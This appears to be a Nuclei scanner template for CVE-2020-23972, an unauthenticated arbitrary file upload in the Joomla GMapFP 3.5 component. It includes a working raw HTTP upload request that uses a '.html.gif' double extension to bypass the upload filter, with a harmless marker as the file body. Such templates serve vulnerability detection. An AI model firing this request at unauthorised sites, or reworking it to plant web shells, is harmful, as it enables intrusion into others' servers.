id: CVE-2020-23972 info: name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload author: dwisiswant0 severity: high description: | Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext. remediation: | Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49129 - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html - https://nvd.nist.gov/vuln/detail/CVE-2020-23972 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2020-23972 cwe-id: CWE-434 epss-score: 0.60915 epss-percentile: 0.97403 cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* metadata: max-request: 2 vendor: gmapfp product: gmapfp framework: joomla\! tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive variables: name: "{{to_lower(rand_text_alpha(5))}}" http: - raw: - | POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: {{BaseURL}} Connection: close ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="option" com_gmapfp ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif" Content-Type: text/html projectdiscovery ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="no_html" no_html ------WebKitFormBoundarySHHbUsfCoxlX1bpS-- payloads: component: - "com_gmapfp" - "comgmapfp" extractors: - type: regex regex: - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" part: body